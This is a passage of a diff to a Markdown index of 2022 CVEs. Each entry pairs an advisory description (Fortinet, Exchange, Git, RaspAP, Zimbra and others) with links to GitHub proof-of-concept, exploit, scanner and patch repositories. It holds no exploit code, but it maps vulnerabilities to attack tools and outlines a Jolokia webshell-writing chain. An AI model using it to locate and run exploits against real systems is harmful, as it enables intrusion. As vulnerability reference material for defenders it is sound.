[xiao-zhu-zhu/pig_CS4.4](https://github.com/xiao-zhu-zhu/pig_CS4.4) +- [Romanc9/Gui-poc-test](https://github.com/Romanc9/Gui-poc-test) + +### CVE-2022-39227 (2022-09-23) + +python-jwt is a module for generating and verifying JSON Web Tokens. Versions prior to 3.3.4 are subject to Authentication Bypass by Spoofing, resulting in identity spoofing, session hijacking or authentication bypass. An attacker who obtains a JWT can arbitrarily forge its contents without knowing the secret key. Depending on the application, this may for example enable the attacker to spoof other user's identities, hijack their sessions, or bypass authentication. Users should upgrade to version 3.3.4. There are no known workarounds. + + +- [user0x1337/CVE-2022-39227](https://github.com/user0x1337/CVE-2022-39227) +- [NoSpaceAvailable/CVE-2022-39227](https://github.com/NoSpaceAvailable/CVE-2022-39227) + +### CVE-2022-39253 (2022-10-19) + +Git is an open source, scalable, distributed revision control system. Versions prior to 2.30.6, 2.31.5, 2.32.4, 2.33.5, 2.34.5, 2.35.5, 2.36.3, and 2.37.4 are subject to exposure of sensitive information to a malicious actor. When performing a local clone (where the source and target of the clone are on the same volume), Git copies the contents of the source's `$GIT_DIR/objects` directory into the destination by either creating hardlinks to the source contents, or copying them (if hardlinks are disabled via `--no-hardlinks`). A malicious actor could convince a victim to clone a repository with a symbolic link pointing at sensitive information on the victim's machine. This can be done either by having the victim clone a malicious repository on the same machine, or having them clone a malicious repository embedded as a bare repository via a submodule from any source, provided they clone with the `--recurse-submodules` option. Git does not create symbolic links in the `$GIT_DIR/objects` directory. The problem has been patched in the versions published on 2022-10-18, and backported to v2.30.x. Potential workarounds: Avoid cloning untrusted repositories using the `--local` optimization when on a shared machine, either by passing the `--no-local` option to `git clone` or cloning from a URL that uses the `file://` scheme. Alternatively, avoid cloning repositories from untrusted sources with `--recurse-submodules` or run `git config --global protocol.file.allow user`. + + +- [ssst0n3/docker-cve-2022-39253-poc](https://github.com/ssst0n3/docker-cve-2022-39253-poc) +- [HiImDarwin/NetworkSecurityFinalProject](https://github.com/HiImDarwin/NetworkSecurityFinalProject) + +### CVE-2022-39275 (2022-10-06) + +Saleor is a headless, GraphQL commerce platform. In affected versions some GraphQL mutations were not properly checking the ID type input which allowed to access database objects that the authenticated user may not be allowed to access. This vulnerability can be used to expose the following information: Estimating database row counts from tables with a sequential primary key or Exposing staff user and customer email addresses and full name through the `assignNavigation()` mutation. This issue has been patched in main and backported to multiple releases (3.7.17, 3.6.18, 3.5.23, 3.4.24, 3.3.26, 3.2.14, 3.1.24). Users are advised to upgrade. There are no known workarounds for this issue. + + +- [omar2535/CVE-2022-39275](https://github.com/omar2535/CVE-2022-39275) + +### CVE-2022-39299 (2022-10-12) + +Passport-SAML is a SAML 2.0 authentication provider for Passport, the Node.js authentication library. A remote attacker may be able to bypass SAML authentication on a website using passport-saml. A successful attack requires that the attacker is in possession of an arbitrary IDP signed XML element. Depending on the IDP used, fully unauthenticated attacks (e.g without access to a valid user) might also be feasible if generation of a signed message can be triggered. Users should upgrade to passport-saml version 3.2.2 or newer. The issue was also present in the beta releases of `node-saml` before version 4.0.0-beta.5. If you cannot upgrade, disabling SAML authentication may be done as a workaround. + + +- [doyensec/CVE-2022-39299_PoC_Generator](https://github.com/doyensec/CVE-2022-39299_PoC_Generator) + +### CVE-2022-39425 (2022-10-18) + +Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are Prior to 6.1.40. Difficult to exploit vulnerability allows unauthenticated attacker with network access via VRDP to compromise Oracle VM VirtualBox. Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. CVSS 3.1 Base Score 8.1 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H). + + +- [bob11vrdp/CVE-2022-39425](https://github.com/bob11vrdp/CVE-2022-39425) + +### CVE-2022-39802 (2022-10-11) + +SAP Manufacturing Execution - versions 15.1, 15.2, 15.3, allows an attacker to exploit insufficient validation of a file path request parameter. The intended file path can be manipulated to allow arbitrary traversal of directories on the remote server. The file content within each directory can be read which may lead to information disclosure. + + +- [vah13/CVE-2022-39802](https://github.com/vah13/CVE-2022-39802) +- [redrays-io/CVE-2022-39802](https://github.com/redrays-io/CVE-2022-39802) + +### CVE-2022-39838 (2022-09-05) + +Systematic FIX Adapter (ALFAFX) 2.4.0.25 13/09/2017 allows remote file inclusion via a UNC share pathname, and also allows absolute path traversal to local pathnames. + + +- [jet-pentest/CVE-2022-39838](https://github.com/jet-pentest/CVE-2022-39838) + +### CVE-2022-39841 +- [stealthcopter/CVE-2022-39841](https://github.com/stealthcopter/CVE-2022-39841) + +### CVE-2022-39952 (2023-02-16) + +A external control of file name or path in Fortinet FortiNAC versions 9.4.0, 9.2.0 through 9.2.5, 9.1.0 through 9.1.7, 8.8.0 through 8.8.11, 8.7.0 through 8.7.6, 8.6.0 through 8.6.5, 8.5.0 through 8.5.4, 8.3.7 may allow an unauthenticated attacker to execute unauthorized code or commands via specifically crafted HTTP request. + + +- [horizon3ai/CVE-2022-39952](https://github.com/horizon3ai/CVE-2022-39952) +- [shiyeshu/CVE-2022-39952_webshell](https://github.com/shiyeshu/CVE-2022-39952_webshell) +- [Chocapikk/CVE-2022-39952](https://github.com/Chocapikk/CVE-2022-39952) +- [dkstar11q/CVE-2022-39952-better](https://github.com/dkstar11q/CVE-2022-39952-better) + +### CVE-2022-39959 (2022-10-07) + +Panini Everest Engine 2.0.4 allows unprivileged users to create a file named Everest.exe in the %PROGRAMDATA%\Panini folder. This leads to privilege escalation because a service, running as SYSTEM, uses the unquoted path of %PROGRAMDATA%\Panini\Everest Engine\EverestEngine.exe and therefore a Trojan horse %PROGRAMDATA%\Panini\Everest.exe may be executed instead of the intended vendor-supplied EverestEngine.exe file. + + +- [usmarine2141/CVE-2022-39959](https://github.com/usmarine2141/CVE-2022-39959) + +### CVE-2022-39986 (2023-08-01) + +A Command injection vulnerability in RaspAP 2.8.0 thru 2.8.7 allows unauthenticated attackers to execute arbitrary commands via the cfg_id parameter in /ajax/openvpn/activate_ovpncfg.php and /ajax/openvpn/del_ovpncfg.php. + + +- [mind2hex/CVE-2022-39986](https://github.com/mind2hex/CVE-2022-39986) +- [tucommenceapousser/RaspAP-CVE-2022-39986-PoC](https://github.com/tucommenceapousser/RaspAP-CVE-2022-39986-PoC) + +### CVE-2022-39987 (2023-08-01) + +A Command injection vulnerability in RaspAP 2.8.0 thru 2.9.2 allows an authenticated attacker to execute arbitrary OS commands as root via the "entity" POST parameters in /ajax/networking/get_wgkey.php. + + +- [miguelc49/CVE-2022-39987-2](https://github.com/miguelc49/CVE-2022-39987-2) +- [miguelc49/CVE-2022-39987-1](https://github.com/miguelc49/CVE-2022-39987-1) +- [miguelc49/CVE-2022-39987-3](https://github.com/miguelc49/CVE-2022-39987-3) + +### CVE-2022-40032 (2023-02-17) + +SQL Injection vulnerability in Simple Task Managing System version 1.0 in login.php in 'username' and 'password' parameters, allows attackers to execute arbitrary code and gain sensitive information. + + +- [h4md153v63n/CVE-2022-40032_Simple-Task-Managing-System-V1.0-SQL-Injection-Vulnerability-Unauthenticated](https://github.com/h4md153v63n/CVE-2022-40032_Simple-Task-Managing-System-V1.0-SQL-Injection-Vulnerability-Unauthenticated) + +### CVE-2022-40126 (2022-09-29) + +A misconfiguration in the Service Mode profile directory of Clash for Windows v0.19.9 allows attackers to escalate privileges and execute arbitrary commands when Service Mode is activated. + + +- [LovelyWei/CVE-2022-40126](https://github.com/LovelyWei/CVE-2022-40126) + +### CVE-2022-40127 (2022-11-14) + +A vulnerability in Example Dags of Apache Airflow allows an attacker with UI access who can trigger DAGs, to execute arbitrary commands via manually provided run_id parameter. This issue affects Apache Airflow Apache Airflow versions prior to 2.4.0. + + +- [Mr-xn/CVE-2022-40127](https://github.com/Mr-xn/CVE-2022-40127) +- [jakabakos/CVE-2022-40127-Airflow-RCE](https://github.com/jakabakos/CVE-2022-40127-Airflow-RCE) + +### CVE-2022-40140 (2022-09-19) + +An origin validation error vulnerability in Trend Micro Apex One and Apex One as a Service could allow a local attacker to cause a denial-of-service on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. + + +- [mr-r3b00t/NotProxyShellHunter](https://github.com/mr-r3b00t/NotProxyShellHunter) +- [ZephrFish/NotProxyShellScanner](https://github.com/ZephrFish/NotProxyShellScanner) +- [ipsBruno/CVE-2022-40140-SCANNER](https://github.com/ipsBruno/CVE-2022-40140-SCANNER) + +### CVE-2022-40146 (2022-09-22) + +Server-Side Request Forgery (SSRF) vulnerability in Batik of Apache XML Graphics allows an attacker to access files using a Jar url. This issue affects Apache XML Graphics Batik 1.14. + + +- [cckuailong/CVE-2022-40146_Exploit_Jar](https://github.com/cckuailong/CVE-2022-40146_Exploit_Jar) +- [soulfoodisgood/CVE-2022-40146](https://github.com/soulfoodisgood/CVE-2022-40146) + +### CVE-2022-40297 (2022-09-08) + +UBports Ubuntu Touch 16.04 allows the screen-unlock passcode to be used for a privileged shell via Sudo. This passcode is only four digits, far below typical length/complexity for a user account's password. NOTE: a third party states "The described attack cannot be executed as demonstrated. + + +- [filipkarc/PoC-ubuntutouch-pin-privesc](https://github.com/filipkarc/PoC-ubuntutouch-pin-privesc) + +### CVE-2022-40317 (2022-09-09) + +OpenKM 6.3.11 allows stored XSS related to the javascript&colon; substring in an A element. + + +- [izdiwho/CVE-2022-40317](https://github.com/izdiwho/CVE-2022-40317) + +### CVE-2022-40347 (2023-02-17) + +SQL Injection vulnerability in Intern Record System version 1.0 in /intern/controller.php in 'phone', 'email', 'deptType' and 'name' parameters, allows attackers to execute arbitrary code and gain sensitive information. + + +- [h4md153v63n/CVE-2022-40347_Intern-Record-System-phone-V1.0-SQL-Injection-Vulnerability-Unauthenticated](https://github.com/h4md153v63n/CVE-2022-40347_Intern-Record-System-phone-V1.0-SQL-Injection-Vulnerability-Unauthenticated) + +### CVE-2022-40348 (2023-02-18) + +Cross Site Scripting (XSS) vulnerability in Intern Record System version 1.0 in /intern/controller.php in 'name' and 'email' parameters, allows attackers to execute arbitrary code. + + +- [h4md153v63n/CVE-2022-40348_Intern-Record-System-Cross-site-Scripting-V1.0-Vulnerability-Unauthenticated](https://github.com/h4md153v63n/CVE-2022-40348_Intern-Record-System-Cross-site-Scripting-V1.0-Vulnerability-Unauthenticated) + +### CVE-2022-40363 (2022-09-29) + +A buffer overflow in the component nfc_device_load_mifare_ul_data of Flipper Devices Inc., Flipper Zero before v0.65.2 allows attackers to cause a Denial of Service (DoS) via a crafted NFC file. + + +- [Olafdaf/CVE-2022-40363](https://github.com/Olafdaf/CVE-2022-40363) + +### CVE-2022-40470 (2022-11-21) + +Phpgurukul Blood Donor Management System 1.0 allows Cross Site Scripting via Add Blood Group Name Feature. + + +- [RashidKhanPathan/CVE-2022-40470](https://github.com/RashidKhanPathan/CVE-2022-40470) + +### CVE-2022-40471 (2022-10-31) + +Remote Code Execution in Clinic's Patient Management System v 1.0 allows Attacker to Upload arbitrary php webshell via profile picture upload functionality in users.php + + +- [RashidKhanPathan/CVE-2022-40471](https://github.com/RashidKhanPathan/CVE-2022-40471) + +### CVE-2022-40490 +- [whitej3rry/CVE-2022-40490](https://github.com/whitej3rry/CVE-2022-40490) + +### CVE-2022-40494 (2022-10-06) + +NPS before v0.26.10 was discovered to contain an authentication bypass vulnerability via constantly generating and sending the Auth key and Timestamp parameters. + + +- [carr0t2/nps-auth-bypass](https://github.com/carr0t2/nps-auth-bypass) + +### CVE-2022-40624 (2022-12-20) + +pfSense pfBlockerNG through 2.1.4_27 allows remote attackers to execute arbitrary OS commands as root via the HTTP Host header, a different vulnerability than CVE-2022-31814. + + +- [dhammon/pfBlockerNg-CVE-2022-40624](https://github.com/dhammon/pfBlockerNg-CVE-2022-40624) + +### CVE-2022-40634 (2022-09-13) + +Improper Control of Dynamically-Managed Code Resources vulnerability in Crafter Studio of Crafter CMS allows authenticated developers to execute OS commands via FreeMarker SSTI. + + +- [mbadanoiu/CVE-2022-40634](https://github.com/mbadanoiu/CVE-2022-40634) + +### CVE-2022-40635 (2022-09-13) + +Improper Control of Dynamically-Managed Code Resources vulnerability in Crafter Studio of Crafter CMS allows authenticated developers to execute OS commands via Groovy Sandbox Bypass. + + +- [mbadanoiu/CVE-2022-40635](https://github.com/mbadanoiu/CVE-2022-40635) + +### CVE-2022-40684 (2022-10-18) + +An authentication bypass using an alternate path or channel [CWE-288] in Fortinet FortiOS version 7.2.0 through 7.2.1 and 7.0.0 through 7.0.6, FortiProxy version 7.2.0 and version 7.0.0 through 7.0.6 and FortiSwitchManager version 7.2.0 and 7.0.0 allows an unauthenticated atttacker to perform operations on the administrative interface via specially crafted HTTP or HTTPS requests. + + +- [horizon3ai/CVE-2022-40684](https://github.com/horizon3ai/CVE-2022-40684) +- [carlosevieira/CVE-2022-40684](https://github.com/carlosevieira/CVE-2022-40684) +- [Filiplain/Fortinet-PoC-Auth-Bypass](https://github.com/Filiplain/Fortinet-PoC-Auth-Bypass) +- [kljunowsky/CVE-2022-40684-POC](https://github.com/kljunowsky/CVE-2022-40684-POC) +- [secunnix/CVE-2022-40684](https://github.com/secunnix/CVE-2022-40684) +- [iveresk/CVE-2022-40684](https://github.com/iveresk/CVE-2022-40684) +- [mhd108/CVE-2022-40684](https://github.com/mhd108/CVE-2022-40684) +- [ClickCyber/cve-2022-40684](https://github.com/ClickCyber/cve-2022-40684) +- [Chocapikk/CVE-2022-40684](https://github.com/Chocapikk/CVE-2022-40684) +- [mohamedbenchikh/CVE-2022-40684](https://github.com/mohamedbenchikh/CVE-2022-40684) +- [HAWA771/CVE-2022-40684](https://github.com/HAWA771/CVE-2022-40684) +- [NeriaBasha/CVE-2022-40684](https://github.com/NeriaBasha/CVE-2022-40684) +- [Grapphy/fortipwn](https://github.com/Grapphy/fortipwn) +- [puckiestyle/CVE-2022-40684](https://github.com/puckiestyle/CVE-2022-40684) +- [jsongmax/Fortinet-CVE-2022-40684](https://github.com/jsongmax/Fortinet-CVE-2022-40684) +- [und3sc0n0c1d0/CVE-2022-40684](https://github.com/und3sc0n0c1d0/CVE-2022-40684) +- [qingsiweisan/CVE-2022-40684](https://github.com/qingsiweisan/CVE-2022-40684) +- [TaroballzChen/CVE-2022-40684-metasploit-scanner](https://github.com/TaroballzChen/CVE-2022-40684-metasploit-scanner) +- [gustavorobertux/gotigate](https://github.com/gustavorobertux/gotigate) +- [hughink/CVE-2022-40684](https://github.com/hughink/CVE-2022-40684) +- [notareaperbutDR34P3r/CVE-2022-40684-Rust](https://github.com/notareaperbutDR34P3r/CVE-2022-40684-Rust) +- [z-bool/CVE-2022-40684](https://github.com/z-bool/CVE-2022-40684) +- [Anthony1500/CVE-2022-40684](https://github.com/Anthony1500/CVE-2022-40684) + +### CVE-2022-40687 (2022-11-18) + +Cross-Site Request Forgery (CSRF) vulnerability in Creative Mail plugin <= 1.5.4 on WordPress. + + +- [williamkhepri/CVE-2022-40687-metasploit-scanner](https://github.com/williamkhepri/CVE-2022-40687-metasploit-scanner) + +### CVE-2022-40769 (2022-09-18) + +profanity through 1.60 has only four billion possible RNG initializations. Thus, attackers can recover private keys from Ethereum vanity addresses and steal cryptocurrency, as exploited in the wild in June 2022. + + +- [PLSRcoin/CVE-2022-40769](https://github.com/PLSRcoin/CVE-2022-40769) + +### CVE-2022-40799 (2022-11-29) + +Data Integrity Failure in 'Backup Config' in D-Link DNR-322L <= 2.60B15 allows an authenticated attacker to execute OS level commands on the device. + + +- [rtfmkiesel/CVE-2022-40799](https://github.com/rtfmkiesel/CVE-2022-40799) + +### CVE-2022-40881 (2022-11-17) + +SolarView Compact 6.00 was discovered to contain a command injection vulnerability via network_test.php + + +- [yilin1203/CVE-2022-40881](https://github.com/yilin1203/CVE-2022-40881) + +### CVE-2022-40916 +- [whitej3rry/CVE-2022-40916](https://github.com/whitej3rry/CVE-2022-40916) + ### CVE-2022-41032 (2022-10-11) NuGet Client Elevation of Privilege Vulnerability @@ -1774,6 +22102,153 @@ - [ethomson/cve-2022-41032](https://github.com/ethomson/cve-2022-41032) +### CVE-2022-41034 (2022-10-11) + +Visual Studio Code Remote Code Execution Vulnerability + + +- [andyhsu024/CVE-2022-41034](https://github.com/andyhsu024/CVE-2022-41034) + +### CVE-2022-41040 (2022-10-03) + +Microsoft Exchange Server Elevation of Privilege Vulnerability + + +- [numanturle/CVE-2022-41040](https://github.com/numanturle/CVE-2022-41040) +- [CentarisCyber/CVE-2022-41040_Mitigation](https://github.com/CentarisCyber/CVE-2022-41040_Mitigation) +- [r3dcl1ff/CVE-2022-41040](https://github.com/r3dcl1ff/CVE-2022-41040) +- [d3duct1v/CVE-2022-41040](https://github.com/d3duct1v/CVE-2022-41040) +- [kljunowsky/CVE-2022-41040-POC](https://github.com/kljunowsky/CVE-2022-41040-POC) +- [rjsudlow/proxynotshell-IOC-Checker](https://github.com/rjsudlow/proxynotshell-IOC-Checker) +- [ITPATJIDR/CVE-2022-41040](https://github.com/ITPATJIDR/CVE-2022-41040) +- [TaroballzChen/CVE-2022-41040-metasploit-ProxyNotShell](https://github.com/TaroballzChen/CVE-2022-41040-metasploit-ProxyNotShell) +- [0-Gram/CVE-2022-41040](https://github.com/0-Gram/CVE-2022-41040) + +### CVE-2022-41080 (2022-11-09) + +Microsoft Exchange Server Elevation of Privilege Vulnerability + + +- [ohnonoyesyes/CVE-2022-41080](https://github.com/ohnonoyesyes/CVE-2022-41080) + +### CVE-2022-41082 (2022-10-03) + +Microsoft Exchange Server Remote Code Execution Vulnerability + + +- [Diverto/nse-exchange](https://github.com/Diverto/nse-exchange) +- [notareaperbutDR34P3r/http-vuln-CVE-2022-41082](https://github.com/notareaperbutDR34P3r/http-vuln-CVE-2022-41082) +- [sikkertech/CVE-2022-41082](https://github.com/sikkertech/CVE-2022-41082) +- [balki97/OWASSRF-CVE-2022-41082-POC](https://github.com/balki97/OWASSRF-CVE-2022-41082-POC) +- [bigherocenter/CVE-2022-41082-POC](https://github.com/bigherocenter/CVE-2022-41082-POC) +- [notareaperbutDR34P3r/vuln-CVE-2022-41082](https://github.com/notareaperbutDR34P3r/vuln-CVE-2022-41082) +- [SUPRAAA-1337/CVE-2022-41082](https://github.com/SUPRAAA-1337/CVE-2022-41082) +- [soltanali0/CVE-2022-41082](https://github.com/soltanali0/CVE-2022-41082) + +### CVE-2022-41099 (2022-11-09) + +BitLocker Security Feature Bypass Vulnerability + + +- [halsey51013/UpdateWindowsRE-CVE-2022-41099](https://github.com/halsey51013/UpdateWindowsRE-CVE-2022-41099) +- [o0MattE0o/CVE-2022-41099-Fix](https://github.com/o0MattE0o/CVE-2022-41099-Fix) +- [g-gill24/WinRE-Patch](https://github.com/g-gill24/WinRE-Patch) +- [dsn1321/KB5025175-CVE-2022-41099](https://github.com/dsn1321/KB5025175-CVE-2022-41099) +- [rhett-hislop/PatchWinRE](https://github.com/rhett-hislop/PatchWinRE) + +### CVE-2022-41114 (2022-11-09) + +Windows Bind Filter Driver Elevation of Privilege Vulnerability + + +- [gmh5225/CVE-2022-41114](https://github.com/gmh5225/CVE-2022-41114) + +### CVE-2022-41218 (2022-09-21) + +In drivers/media/dvb-core/dmxdev.c in the Linux kernel through 5.19.10, there is a use-after-free caused by refcount races, affecting dvb_demux_open and dvb_dmxdev_release. + + +- [Tobey123/CVE-2022-41218](https://github.com/Tobey123/CVE-2022-41218) + +### CVE-2022-41220 (2022-09-21) + +md2roff 1.9 has a stack-based buffer overflow via a Markdown file, a different vulnerability than CVE-2022-34913. NOTE: the vendor's position is that the product is not intended for untrusted input + + +- [Halcy0nic/CVE-2022-41220](https://github.com/Halcy0nic/CVE-2022-41220) + +### CVE-2022-41272 (2022-12-13) + +An unauthenticated attacker over the network can attach to an open interface exposed through JNDI by the User Defined Search (UDS) of SAP NetWeaver Process Integration (PI) - version 7.50 and make use of an open naming and directory API to access services which can be used to perform unauthorized operations affecting users and data across the entire system. This allows the attacker to have full read access to user data, make limited modifications to user data, and degrade the performance of the system, leading to a high impact on confidentiality and a limited impact on the availability and integrity of the application.\n + + +- [redrays-io/CVE-2022-41272](https://github.com/redrays-io/CVE-2022-41272) + +### CVE-2022-41333 (2023-03-07) + +An uncontrolled resource consumption vulnerability [CWE-400] in FortiRecorder version 6.4.3 and below, 6.0.11 and below login authentication mechanism may allow an unauthenticated attacker to make the device unavailable via crafted GET requests. + + +- [polar0x/CVE-2022-41333](https://github.com/polar0x/CVE-2022-41333) + +### CVE-2022-41343 (2022-09-25) + +registerFont in FontMetrics.php in Dompdf before 2.0.1 allows remote file inclusion because a URI validation failure does not halt font registration, as demonstrated by a @font-face rule. + + +- [BKreisel/CVE-2022-41343](https://github.com/BKreisel/CVE-2022-41343) + +### CVE-2022-41352 (2022-09-26) + +An issue was discovered in Zimbra Collaboration (ZCS) 8.8.15 and 9.0. An attacker can upload arbitrary files through amavis via a cpio loophole (extraction to /opt/zimbra/jetty/webapps/zimbra/public) that can lead to incorrect access to any other user accounts. Zimbra recommends pax over cpio. Also, pax is in the prerequisites of Zimbra on Ubuntu; however, pax is no longer part of a default Red Hat installation after RHEL 6 (or CentOS 6). Once pax is installed, amavis automatically prefers it over cpio. + + +- [segfault-it/cve-2022-41352](https://github.com/segfault-it/cve-2022-41352) +- [Cr4ckC4t/cve-2022-41352-zimbra-rce](https://github.com/Cr4ckC4t/cve-2022-41352-zimbra-rce) +- [qailanet/cve-2022-41352-zimbra-rce](https://github.com/qailanet/cve-2022-41352-zimbra-rce) + +### CVE-2022-41358 (2022-10-20) + +A stored cross-site scripting (XSS) vulnerability in Garage Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the categoriesName parameter in createCategories.php. + + +- [thecasual/CVE-2022-41358](https://github.com/thecasual/CVE-2022-41358) + +### CVE-2022-41401 (2023-08-04) + +OpenRefine <= v3.5.2 contains a Server-Side Request Forgery (SSRF) vulnerability, which permits unauthorized users to exploit the system, potentially leading to unauthorized access to internal resources and sensitive file disclosure. + + +- [ixSly/CVE-2022-41401](https://github.com/ixSly/CVE-2022-41401) + +### CVE-2022-41412 (2022-11-30) + +An issue in the graphData.cgi component of perfSONAR v4.4.5 and prior allows attackers to access sensitive data and execute Server-Side Request Forgery (SSRF) attacks. + + +- [renmizo/CVE-2022-41412](https://github.com/renmizo/CVE-2022-41412) + +### CVE-2022-41413 (2022-11-30) + +perfSONAR v4.x <= v4.4.5 was discovered to contain a Cross-Site Request Forgery (CSRF) which is triggered when an attacker injects crafted input into the Search function. + + +- [renmizo/CVE-2022-41413](https://github.com/renmizo/CVE-2022-41413) + +### CVE-2022-41445 (2022-11-22) + +A cross-site scripting (XSS) vulnerability in Record Management System using CodeIgniter 1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Add Subject page. + + +- [RashidKhanPathan/CVE-2022-41445](https://github.com/RashidKhanPathan/CVE-2022-41445) + +### CVE-2022-41446 (2022-11-23) + +An access control issue in /Admin/dashboard.php of Record Management System using CodeIgniter v1.0 allows attackers to access and modify user data. + + +- [RashidKhanPathan/CVE-2022-41446](https://github.com/RashidKhanPathan/CVE-2022-41446) + ### CVE-2022-41540 (2022-10-18) The web app client of TP-Link AX10v1 V1_211117 uses hard-coded cryptographic keys when communicating with the router. Attackers who are able to intercept the communications between the web client and router through a man-in-the-middle attack can then obtain the sequence key via a brute-force attack, and access sensitive information. @@ -1781,9 +22256,1035 @@ - [efchatz/easy-exploits](https://github.com/efchatz/easy-exploits) +### CVE-2022-41544 (2022-10-18) + +GetSimple CMS v3.3.16 was discovered to contain a remote code execution (RCE) vulnerability via the edited_file parameter in admin/theme-edit.php. + + +- [yosef0x01/CVE-2022-41544](https://github.com/yosef0x01/CVE-2022-41544) +- [n3rdh4x0r/CVE-2022-41544](https://github.com/n3rdh4x0r/CVE-2022-41544) + +### CVE-2022-41622 (2022-12-07) + +In all versions, \n\nBIG-IP and BIG-IQ are vulnerable to cross-site request forgery (CSRF) attacks through iControl SOAP.  \n\nNote: Software versions which have reached End of Technical Support (EoTS) are not evaluated.\n\n + + +- [rbowes-r7/refreshing-soap-exploit](https://github.com/rbowes-r7/refreshing-soap-exploit) + +### CVE-2022-41678 (2023-11-28) + +Once an user is authenticated on Jolokia, he can potentially trigger arbitrary code execution. \n\nIn details, in ActiveMQ configurations, jetty allows\norg.jolokia.http.AgentServlet to handler request to /api/jolokia\n\norg.jolokia.http.HttpRequestHandler#handlePostRequest is able to\ncreate JmxRequest through JSONObject. And calls to\norg.jolokia.http.HttpRequestHandler#executeRequest.\n\nInto deeper calling stacks,\norg.jolokia.handler.ExecHandler#doHandleRequest can be invoked\nthrough refection. This could lead to RCE through via\nvarious mbeans. One example is unrestricted deserialization in jdk.management.jfr.FlightRecorderMXBeanImpl which exists on Java version above 11.\n\n1 Call newRecording.\n\n2 Call setConfiguration. And a webshell data hides in it.\n\n3 Call startRecording.\n\n4 Call copyTo method. The webshell will be written to a .jsp file.\n\nThe mitigation is to restrict (by default) the actions authorized on Jolokia, or disable Jolokia.\nA more restrictive Jolokia configuration has been defined in default ActiveMQ distribution. We encourage users to upgrade to ActiveMQ distributions version including updated Jolokia configuration: 5.16.6, 5.17.4, 5.18.0, 6.0.0.\n + + +- [mbadanoiu/CVE-2022-41678](https://github.com/mbadanoiu/CVE-2022-41678) + +### CVE-2022-41717 (2022-12-08) + +An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests. HTTP/2 server connections contain a cache of HTTP header keys sent by the client. While the total number of entries in this cache is capped, an attacker sending very large keys can cause the server to allocate approximately 64 MiB per open connection. + + +- [domdom82/h2conn-exploit](https://github.com/domdom82/h2conn-exploit) + +### CVE-2022-41741 (2022-10-19) + +NGINX Open Source before versions 1.23.2 and 1.22.1, NGINX Open Source Subscription before versions R2 P1 and R1 P1, and NGINX Plus before versions R27 P1 and R26 P1 have a vulnerability in the module ngx_http_mp4_module that might allow a local attacker to corrupt NGINX worker memory, resulting in its termination or potential other impact using a specially crafted audio or video file. The issue affects only NGINX products that are built with the ngx_http_mp4_module, when the mp4 directive is used in the configuration file. Further, the attack is possible only if an attacker can trigger processing of a specially crafted audio or video file with the module ngx_http_mp4_module. + + +- [dumbbutt0/evilMP4](https://github.com/dumbbutt0/evilMP4) + +### CVE-2022-41828 (2022-09-29) + +In Amazon AWS Redshift JDBC Driver (aka amazon-redshift-jdbc-driver or redshift-jdbc42) before 2.1.0.8, the Object Factory does not check the class type when instantiating an object from a class name. + + +- [murataydemir/CVE-2022-41828](https://github.com/murataydemir/CVE-2022-41828) + +### CVE-2022-41852 +- [Warxim/CVE-2022-41852](https://github.com/Warxim/CVE-2022-41852) +- [xpectomas/CVE-2022-41852-Disable](https://github.com/xpectomas/CVE-2022-41852-Disable) + +### CVE-2022-41853 (2022-10-06) + +Those using java.sql.Statement or java.sql.PreparedStatement in hsqldb (HyperSQL DataBase) to process untrusted input may be vulnerable to a remote code execution attack. By default it is allowed to call any static method of any Java class in the classpath resulting in code execution. The issue can be prevented by updating to 2.7.1 or by setting the system property "hsqldb.method_class_names" to classes which are allowed to be called. For example, System.setProperty("hsqldb.method_class_names", "abc") or Java argument -Dhsqldb.method_class_names="abc" can be used. From version 2.7.1 all classes by default are not accessible except those in java.lang.Math and need to be manually enabled. + + +- [mbadanoiu/CVE-2022-41853](https://github.com/mbadanoiu/CVE-2022-41853) + +### CVE-2022-41876 (2022-11-10) + +ezplatform-graphql is a GraphQL server implementation for Ibexa DXP and Ibexa Open Source. Versions prior to 2.3.12 and 1.0.13 are subject to Insecure Storage of Sensitive Information. Unauthenticated GraphQL queries for user accounts can expose password hashes of users that have created or modified content, typically administrators and editors. This issue has been patched in versions 2.3.12, and 1.0.13 on the 1.X branch. Users unable to upgrade can remove the "passwordHash" entry from "src/bundle/Resources/config/graphql/User.types.yaml" in the GraphQL package, and other properties like hash type, email, login if you prefer. + + +- [Skileau/CVE-2022-41876](https://github.com/Skileau/CVE-2022-41876) + +### CVE-2022-41903 (2023-01-17) + +Git is distributed revision control system. `git log` can display commits in an arbitrary format using its `--format` specifiers. This functionality is also exposed to `git archive` via the `export-subst` gitattribute. When processing the padding operators, there is a integer overflow in `pretty.c::format_and_pad_commit()` where a `size_t` is stored improperly as an `int`, and then added as an offset to a `memcpy()`. This overflow can be triggered directly by a user running a command which invokes the commit formatting machinery (e.g., `git log --format=...`). It may also be triggered indirectly through git archive via the export-subst mechanism, which expands format specifiers inside of files within the repository during a git archive. This integer overflow can result in arbitrary heap writes, which may result in arbitrary code execution. The problem has been patched in the versions published on 2023-01-17, going back to v2.30.7. Users are advised to upgrade. Users who are unable to upgrade should disable `git archive` in untrusted repositories. If you expose git archive via `git daemon`, disable it by running `git config --global daemon.uploadArch false`. + + +- [sondermc/git-cveissues](https://github.com/sondermc/git-cveissues) + +### CVE-2022-41923 (2022-11-23) + +Grails Spring Security Core plugin is vulnerable to privilege escalation. The vulnerability allows an attacker access to one endpoint (i.e. the targeted endpoint) using the authorization requirements of a different endpoint (i.e. the donor endpoint). In some Grails framework applications, access to the targeted endpoint will be granted based on meeting the authorization requirements of the donor endpoint, which can result in a privilege escalation attack. This vulnerability has been patched in grails-spring-security-core versions 3.3.2, 4.0.5 and 5.1.1. Impacted Applications: Grails Spring Security Core plugin versions: 1.x 2.x >=3.0.0 <3.3.2 >=4.0.0 <4.0.5 >=5.0.0 <5.1.1 We strongly suggest that all Grails framework applications using the Grails Spring Security Core plugin be updated to a patched release of the plugin. Workarounds: Users should create a subclass extending one of the following classes from the `grails.plugin.springsecurity.web.access.intercept` package, depending on their security configuration: * `AnnotationFilterInvocationDefinition` * `InterceptUrlMapFilterInvocationDefinition` * 